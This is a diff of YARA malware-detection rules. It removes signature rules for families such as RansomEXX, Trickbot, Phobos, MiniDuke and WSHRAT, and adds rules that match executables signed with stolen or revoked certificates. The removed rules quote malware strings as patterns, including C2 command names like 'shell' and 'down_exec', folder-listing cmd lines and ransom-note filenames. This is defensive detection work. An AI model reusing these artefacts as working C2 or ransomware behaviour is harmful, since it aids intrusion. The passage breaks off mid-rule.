-		$cnc4 = "&command=down_exec" ascii
-		$cnc5 = "&command=message" ascii
-		$cnc6 = "&command=open_link" ascii
-		$cnc7 = "&command=down_exec" ascii
-		$cnc8 = "&command=shell" ascii
-		$pdb = "\\Users\\CHUWI\\Documents\\CPROJ\\Downloader\\svchost" ascii
-		$rcnc1 = "inc/check_command.php" ascii
-		$rcnc2 = "inc/get_command.php" ascii
-		$rcnc3 = "php?btc" ascii
-		$rcnc4 = "php?hwid" ascii
-		$x1 = "> %USERPROFILE%\\Desktop\\HOW_DECRYPT_FILES.seth.txt" ascii
-		$x2 = "/C dir /b %USERPROFILE%\\Documents > %temp%\\doc.txt" ascii
-		$x3 = "/C dir /b %USERPROFILE%\\Desktop > %temp%\\desk.txt" ascii
-		$x4 = "/C dir /b %USERPROFILE%\\Downloads > %temp%\\downs.txt" ascii
-		$x5 = "/C dir /b %USERPROFILE%\\Pictures > %temp%\\pics.txt" ascii
-		$x6 = "for /F \"delims=\" %%a in ('mshta.exe \"%~F0\"') do set \"HTA=%%a\"" ascii
-		$x7 = "\\svchost.exe" fullword ascii
-		$x8 = ".seth" fullword ascii
-		$x9 = "MyAgent" fullword ascii
+		thumbprint = "5ae8bd51ffa8e82f8f3d8297c4f9caf5e30f425a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $pdb or 5 of ( $cmd* ) or 4 of ( $cnc* ) or all of ( $rcnc* ) or 5 of ( $x* ) or 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Gulpix : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_02C5351936Abe405Ac760228A40387E8 : FILE
 {
 	meta:
-		description = "Detects Gulpix/HyperPlus backddor"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b3dfd1d9-42fe-57d4-8047-135103689be7"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "32e200c3-678f-5be4-b55b-2a7a32e56843"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3803-L3832"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L458-L469"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5026726f093b31b444fc934ac1446b6c25f182b8714a37da05f4498f32a9a65f"
+		logic_hash = "ae9e428c5e7c1ab67be291da93e6d3fa694e3a9b347672817cbf1cac44837a04"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "MainServer.dll" fullword ascii
-		$x2 = "NvSmartMax.dat" fullword wide
-		$x3 = "NvSmartMax.dll" fullword wide
-		$x4 = "http://+:80/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7/" fullword wide
-		$s1 = "IP retriever" fullword wide
-		$s2 = "\\cmd.exe" fullword wide
-		$s3 = "\\msnetwork-cache.db" fullword wide
-		$s4 = "http://+:" wide
-		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" fullword wide
-		$s6 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii
-		$s7 = "Got a unknown request for %ws" wide
-		$s8 = "HttpReceiveRequestEntityBody failed with %lu" wide
-		$s9 = "FD873AC4-CF86-4FED-84EC-4BD59C6F17A7" wide
+		thumbprint = "1174c2affb0a364c1b7a231168cfdda5989c04c5"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 6 of ( $s* ) or ( 2 of ( $x* ) and 4 of ( $s* ) ) or ( 2 of them and pe.exports ( "daemon" ) and pe.exports ( "run" ) and pe.exports ( "session" ) and pe.exports ( "work" ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" )
 }
-rule DITEKSHEN_MALWARE_Linux_Ransomexx : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_08D4352185317271C1Cec9D05C279Af7 : FILE
 {
 	meta:
-		description = "Detects RansomEXX ransomware"
-		author = "ditekshen"
-		id = "b449afc7-9055-55ed-a876-316d1aea8fee"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "a0197037-874c-55e7-80aa-e8b7156a26a3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3834-L3858"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L471-L482"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c233ccc3e741cb2c53f182c48093e41595a82a3f4e5bdb1dc0204f1f57b96c2a"
+		logic_hash = "6f4b8a52e152097a6e18f55b6b677eb1ba0f4da78ce68ffa35510bfb485e01e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Linux.Ransomware.RansomEXX"
-
-	strings:
-		$c1 = "crtstuff.c" fullword ascii
-		$c2 = "cryptor.c" fullword ascii
-		$c3 = "ransomware.c" fullword ascii
-		$c4 = "logic.c" fullword ascii
-		$c5 = "enum_files.c" fullword ascii
-		$c6 = "readme.c" fullword ascii
-		$c7 = "ctr_drbg.c" fullword ascii
-		$s1 = "regenerate_pre_data" fullword ascii
-		$s2 = "g_RansomHeader" fullword ascii
-		$s3 = "CryptOneBlock" fullword ascii
-		$s4 = "RansomLogic" fullword ascii
-		$s5 = "CryptOneFile" fullword ascii
-		$s6 = "encrypt_worker" fullword ascii
-		$s7 = "list_dir" fullword ascii
-		$s8 = "ctr_drbg_update_internal" fullword ascii
+		thumbprint = "52fe4ecd6c925e89068fee38f1b9a669a70f8bab"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 5 of ( $c* ) or 6 of ( $s* ) or ( 3 of ( $c* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" )
 }
-rule DITEKSHEN_MALWARE_Win_Trickbotmodule : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ed8Ade5D73B73Dade6943D557Ff87E5 : FILE
 {
 	meta:
-		description = "Detects Trickbot modules"
-		author = "ditekshen"
-		id = "c56c664f-5928-5e2e-ab06-0b9d504981be"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "ebdab290-d388-528e-b392-0ae87941b69d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3860-L3881"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L484-L495"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d06653dad5f8a18598855212548364b3c3d2b68b99784846b494fcb1d1c8df9"
+		logic_hash = "e2e269a83a86567bf359996945cddc597406033aa7c5a7acf30b58d30816b28f"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$mc = "<moduleconfig>" ascii
-		$s1 = "<autostart>" ascii
-		$s2 = "<nohead>" ascii
-		$s3 = "<needinfo" ascii
-		$s4 = "<conf ctl" ascii
-		$s5 = "<limit>" ascii
-		$w1 = "<sys>yes</sys>" ascii
-		$w2 = "<sys>no</sys>" ascii
-		$w3 = "<autostart>yes</autostart>" ascii
-		$w4 = "<autostart>no</autostart>" ascii
-		$w5 = "<nohead>yes</nohead>" ascii
-		$w6 = "<nohead>no</nohead>" ascii
-		$w7 = /<limit>\d+<\/limit>/ ascii
-		$w8 = "<moduleconfig> </moduleconfig" ascii
+		thumbprint = "9bbd8476bf8b62be738437af628d525895a2c9c9"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $mc and ( 2 of ( $s* ) or ( 1 of ( $s* ) and 1 of ( $w* ) ) or 1 of ( $w* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" )
 }
-rule DITEKSHEN_MALWARE_Win_Gaudox : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ed1847A2Ae5D71Def1E833Fddd33D38 : FILE
 {
 	meta:
-		description = "Detects Gaudox RAT"
-		author = "ditekshen"
-		id = "c60ac433-20a1-5f01-9447-fa99621bd9e2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "5e09087b-3fd0-5979-8f98-f242231c8b4f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3883-L3893"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L497-L508"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "117ee89e264067ab3e695688872bbe7d83963731e877d04ac7e2505e64f6e793"
+		logic_hash = "2acc6d2262bac8bfe49bb244d62be4dcf626dd9b2c9786b7a8963c48b17e6ab9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "hdr=%s&tid;=%s&cid;=%s&trs;=%i" ascii wide
-		$s2 = "\\\\\\\\.\\\\PhysicalDrive%u" ascii wide
+		thumbprint = "e611a7d4cd6bb8650e1e670567ac99d0bf24b3e8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" )
 }
-rule DITEKSHEN_MALWARE_Win_Phobos : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0292C7D574132Ba5C0441D1C7Ffcb805 : FILE
 {
 	meta:
-		description = "Detects Phobos ransomware"
-		author = "ditekshen"
-		id = "7bf659ef-f2a1-5ee2-a334-c233e26a2526"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "0792bf83-c0e9-55f8-b6bd-b05bc575e2b4"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3895-L3908"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L510-L521"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bbf8eef0863e9d6423b3b0f938561b2be486b92b4f59b5d0b67f52dba536a582"
+		logic_hash = "8d0a6714ce5bfed90c80dcfffe4f1d61ec25c817cdc48907cbc67bcee52a1d9a"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\\\?\\UNC\\\\\\e-" fullword wide
-		$x2 = "\\\\?\\ :" fullword wide
-		$x3 = "POST" fullword wide
-		$s1 = "ELVL" fullword wide
-		$s2 = /SUP\d{3}/ fullword wide
-		$s3 = { 41 31 47 ?? 41 2b }
+		thumbprint = "d0ae777a34d4f8ce6b06755c007d2d92db2a760c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" )
 }
-rule DITEKSHEN_MALWARE_Win_Ratty : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_028D50Ae0C554B49148E82Db5B1C2699 : FILE
 {
 	meta:
-		description = "Detects Ratty Java RAT"
-		author = "ditekshen"
-		id = "87719e28-dfe7-5366-8d90-65e6c0c6fb4f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		author = "ditekSHen"
+		id = "35cd05db-c399-5d37-a191-9170b048e263"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3910-L3929"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L523-L534"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d90bca1b18023da8e60cb6ca86d1c562bff3867c6d5cf893dce605ebb92b9637"
+		logic_hash = "7fe907059e83a058705a2884d514938c51fd206b0a175cfb9e8619244c20c62f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/rat/RattyClient.class" ascii
-		$s2 = "/rat/ActiveConnection.class" ascii
-		$s3 = "/rat/attack/" ascii
-		$s4 = "/rat/gui/swing/Ratty" ascii
-		$s5 = "/rat/packet/PasswordPacket" ascii
-		$s6 = "/rat/packet/" ascii
-		$e1 = "/engine/Keyboard.class" ascii
-		$e2 = "/engine/IMouseListener.class" ascii
-		$e3 = "/engine/Screen$ResizeBehavior.class" ascii
-		$e4 = "/engine/fx/ISoundListener.class" ascii
-		$e5 = "/engine/net/TCPServer.class" ascii
-		$e6 = "/engine/noise/PerlinNoise.class" ascii
+		thumbprint = "0abdbc13639c704ff325035439ea9d20b08bc48e"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x4b50 ) and ( 3 of ( $s* ) or all of ( $e* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" )
 }
-rule DITEKSHEN_MALWARE_Win_Fatduke : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ca41D2D9F5E991F49B162D584B0F386 : FILE
 {
 	meta:
-		description = "Detects FatDuke"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "dc80c0f0-c61c-5f0c-841b-3a75e8a1cef3"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bd395177-daf6-56b1-822c-e659083e0f53"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3931-L3946"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L536-L547"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7923d15b10098e9402614fe7107a6ba1d71512efa6e462d522ef64e13f82b47"
+		logic_hash = "51f80dfd63b273e62abaa8b60a00525cfdc6b28341466a9f414703382ad088bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\?\\Volume" fullword ascii
-		$s2 = "WINHTTP_AUTOPROXY_OPTIONS@@PAUWINHTTP_PROXY_INFO@@" ascii
-		$s3 = "WINHTTP_CURRENT_USER_IE_PROXY_CONFIG@@" ascii
-		$s4 = "Cannot write a Cannot find the too long string mber of records Log malfunction! Cannot create ain an invalid ra Internal sync iright function iWaitForSingleObjffsets" ascii
-		$pattern = "()$^.*+?[]|\\-{},:=!" ascii
-		$b64 = "eyJjb25maWdfaWQiOi" wide
+		thumbprint = "23250aa8e1b8ae49a64d09644db3a9a65f866957"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $b64 and 2 of them ) or ( #pattern > 3 and 2 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VB CORPORATE PTY. LTD." and pe.signatures [ i ] . serial == "0c:a4:1d:2d:9f:5e:99:1f:49:b1:62:d5:84:b0:f3:86" )
 }
-rule DITEKSHEN_MALWARE_Win_Miniduke : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1389C8373C00B792207Bca20Aa40Aa40 : FILE
 {
 	meta:
-		description = "Detects MiniDuke"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "947cd414-d19d-5543-8961-94aef69cc94e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7f22411b-6e66-5177-8837-12b82b3b916b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3948-L3969"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L549-L560"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3ab139b4fda2ff9678ceecbdf5ac0c57536bd658f62aa9d19610028b0a5f92c"
+		logic_hash = "5c0c9ca9e1179f253f1b2ecd9c8a1a0ed17345eb9830201c7c16050339d7ccbc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "DefPipe" fullword ascii
-		$s2 = "term %5d" fullword ascii
-		$s3 = "pid %5d" fullword ascii
-		$s4 = "uptime %5d.%02dh" fullword ascii
-		$s5 = "login: %s\\%s" fullword ascii
-		$s6 = "Software\\Microsoft\\ApplicationManager" ascii
-		$s7 = { 69 64 6c 65 ?? 00 73 74 6f 70 ?? 00 61 63 63 65 70 74 ?? 00 63 6f 6e 6e 65 63 74 ?? 00 6c 69 73 74 65 6e ?? 00 }
-		$net1 = "salesappliances.com" ascii
-		$net2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" fullword ascii
-		$net3 = "http://10." ascii
-		$net4 = "JiM9t8g7j8KoJkLJlKqka8dbo7q5z4v5u3o4z" ascii
-		$net5 = "application/octet-stream" ascii
-		$net6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" ascii
+		thumbprint = "38f65d64ac93f080b229ab83cb72619b0754fa6f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $net* ) or 7 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VITA-DE d.o.o." and pe.signatures [ i ] . serial == "13:89:c8:37:3c:00:b7:92:20:7b:ca:20:aa:40:aa:40" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Polyglotduke : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A596Fd2779E507Aa466D159706Fe4150 : FILE
 {
 	meta:
-		description = "Detects PolyGlotDuke"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "01ac90db-35f6-5192-8630-81000573b4f9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8cf28e2a-d90f-5bf6-b746-7f46e8f6aa2a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3971-L3986"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L562-L573"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c1fb8ea1d21768cbd65bd7b91e3f817fa97a0a933b511dff2ae4d5db49bdb2ec"
+		logic_hash = "b88f346175e9084fdba94b9a8cbbf28a5012d28ab43350d927aac099921ab1a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = { 48 b9 ff ff ff ff ff ff ff ff 51 48 23 8c 24 ?? 00 00 00 48 89 8C 24 00 00 00 00 }
-		$s2 = { 56 be ff ff ff ff 56 81 e6 7f }
-		$s3 = { 48 8b 05 19 ?4 4b 00 48 05 48 83 00 00 4c 8b 44 24 50 8b 54 24 48 48 8b }
+		thumbprint = "104c4183e248d63a6e2ad6766927b070c81afcb6"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) ) or ( 2 of them and pe.exports ( "InitSvc" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ClamAV" and pe.signatures [ i ] . serial == "a5:96:fd:27:79:e5:07:aa:46:6d:15:97:06:fe:41:50" )
 }
-rule DITEKSHEN_MALWARE_Win_Guidlma : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_45D76C63929C4620Ab706772F5907F82 : FILE
 {
 	meta:
-		description = "Detects Guildma"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "135ddc6a-5001-54c0-a66c-3e0e5fe6319f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "6ade67b1-cff5-5e5d-917c-f31010e09b82"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3988-L4006"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L575-L586"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "11a0d9c67139627b6820c928840d816ed22b48452ce0b2f856c86c183cdfc8ab"
+		logic_hash = "9854a8812f55f2ae7cddc714b780def3d0511b236685a17ffe202711237c4b7e"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$v1_1 = "marxvxinhhm98.dll" fullword wide
-		$v1_2 = "marxvxinhhmxa.gif" fullword wide
-		$v1_3 = "marxvxinhhmxb.gif" fullword wide
-		$v1_4 = "c:\\programdata" fullword wide
-		$v1_5 = "\\tempa\\" fullword wide
-		$v2_1 = "C:\\Windows\\System32\\dllhost.exe" fullword ascii
-		$v2_2 = "C:\\Windows\\SysWOW64\\dllhost.exe" fullword ascii
-		$v2_3 = "C:\\Users\\Public\\go" fullword ascii
-		$v2_4 = ":%:*:/:>:C:H:W:\\:a:p:u:z:" fullword ascii
-		$v2_5 = ": :%:*:9:>:C:R:W:\\:k:p:u:" fullword ascii
-		$v2_6 = ":*:/:4:C:H:M:\\:a:f:u:z:" fullword ascii
+		thumbprint = "67c4afae16e5e2f98fe26b4597365b3cfed68b58"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of ( $v1* ) or 5 of ( $v2* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEON CRAYON LIMITED" and pe.signatures [ i ] . serial == "45:d7:6c:63:92:9c:46:20:ab:70:67:72:f5:90:7f:82" )
 }
-rule DITEKSHEN_MALWARE_Win_Cybergate : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5029Daca439511456D9Ed8153703F4Bc : FILE
 {
 	meta:
-		description = "Detects CyberGate/Spyrat/Rebhip RTA"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "3b50ccfb-6603-5002-8ceb-e9252d4c7dff"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1d7f0d61-fbe7-58d1-a9d8-083678e8b9bd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4008-L4026"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L588-L599"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b4a3c07533c2b251e1a714b28fb0b654c76881fb6ce970f6586c5908ee65609b"
+		logic_hash = "256b4bebbe4567de9e7d1938dd99f7f9fa13749de2f331aec0bc15f4ab5ab488"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "UnitInjectLibrary" ascii
-		$s2 = "TLoader" fullword ascii
-		$s3 = "\\\\.\\SyserDbgMsg" fullword ascii
-		$s4 = "\\\\.\\SyserBoot" fullword ascii
-		$s5 = "\\signons" ascii
-		$s6 = "####@####" ascii
-		$s7 = "XX-XX-XX-XX" fullword ascii
-		$s8 = "EditSvr" ascii
-		$s9 = "_x_X_PASSWORDLIST_X_x_" fullword ascii
-		$s10 = "L$_RasDefaultCredentials#0" fullword ascii
-		$s11 = "password" nocase ascii
+		thumbprint = "9d5ded35ffd34aa78273f0ebd4d6fa1e5337ac2b"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE GREEN PARTNERSHIP LTD" and pe.signatures [ i ] . serial == "50:29:da:ca:43:95:11:45:6d:9e:d8:15:37:03:f4:bc" )
 }
-rule DITEKSHEN_MALWARE_Win_WSHRATJS : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1C7D3F6E116554809F49Ce16Ccb62E84 : FILE
 {
 	meta:
-		description = "Detects WSHRAT JS variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "7dbaea67-48dc-5fb8-ba58-b0d6eeca207b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "66f4c531-5c0d-5467-a875-eff00a5d00c8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L4028-L4045"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L601-L612"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9956ed4613ac403360ab0222a7ed62350fcd998710843bd6700717f8bbb5052e"
+		logic_hash = "f24037e6ac40844095e06ea12cebdf4dd22a35382c728f9586b90e40c57a4188"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$charset_full = "us-ascii" nocase ascii
-		$charset_begin = "\"us-\"" nocase ascii
-		$charset_end = "Array(97,115,99,105,105)" nocase ascii
-		$wsc_object1 = "WScript.CreateObject(\"System.Text.UTF8Encoding" nocase ascii
-		$wsc_object2 = "WScript.CreateObject(\"Adodb.Stream" nocase ascii
-		$wsc_object3 = "WScript.CreateObject(\"Microsoft.XmlDom" nocase ascii
-		$s1 = "function(){return" ascii
-		$s2 = "}catch(err){" ascii
-		$s3 = "{item: \"bin.base64\"}" nocase ascii
-		$s4 = "* 1].item =" ascii
+		thumbprint = ""
+		importance = 20
 
 	condition:
